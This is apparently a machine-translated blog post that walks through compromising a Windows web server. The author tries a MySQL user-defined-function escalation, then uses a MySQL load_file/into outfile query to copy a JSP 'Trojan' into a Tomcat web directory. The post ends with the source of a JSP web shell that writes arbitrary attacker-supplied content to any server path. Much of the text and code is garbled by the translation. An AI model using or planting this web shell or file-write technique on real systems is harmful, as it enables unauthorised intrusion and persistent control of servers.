Today, I encountered such a problem and briefly recorded my solution. First, let's talk about the server environment. Port 80 of the server is configured according to the standard virtual host. It supports asp, aspx, and php, but does not support the installation of mssql (port 1433), tomcat (port 8080 ), no sa password or serv-u password is available when the serv-u (Port 43958) and two mysql (Port 3306 and port 3307) are revoked, mysql 5.1 first runs 1 show variables like '% plugin %'; and then exports the dll to C according to the settings: \ Program Files \ MySQL Server 5.1 \ lib \ User-Defined Function creation seems to have been blocked and failed. Then find the tomcat directory and prepare to write files to the tomcat Directory: C: /Program Files/cngradms_x86/tomcat/webapps/ROOT/has no write permission to test whether mysql has the write permission. Therefore, upload the jsp Trojan to the website's web directory: d: \ xxx \ fuck. jsp uses mysql to execute the statement: 1 select load_file ('d: \ xxx \ fuck. jsp ') into outfile 'C: \ Program Files \ cngradms_x86 \ tomcat \ webapps \ ROOT \ upload \ fuck. jsp '2 successfully copied the code. However, the following message is displayed after access: it is obvious that the Escape Character \ n \ r is automatically added in MySQL windows, which causes program running tragedy. I found a lot of methods on the Internet. What update should I do to remove the Escape Character and enclose barabara? No one can use the various methods. Finally, we got this small Script: 01 <% @ page language = "java" pageEncoding = "gbk" %> 02 <jsp: directive. page import = "java. io. file "/> 03 <jsp: directive. page import = "java. io. outputStream "/> 04 <jsp: directive. page import = "java. io. fileOutputStream "/> 05 <% int I = 0; String method = request. getParameter ("act"); if (method! = Null & method. equals ("yoco") {String url = request. getParameter ("url"); String text = request. getParameter ("smart"); File f = new File (url); if (f. exists () {f. delete () ;}try {OutputStream o = new FileOutputStream (f); o. write (text. getBytes (); o. close () ;}catch (Exception e) {I ++; %> 06 error www.2cto. com07 <% }} if (I = 0) {%> 08 ok09 <% }%> 10 <form action = '? Act = yoco 'method = 'post'> <input size = "100" value = "<% = application. getRealPath ("/") %> "name =" url "> <br> <textarea rows =" 20 "cols =" 80 "name =" smart "> This prevents escape characters from running JSP horses. 500 error.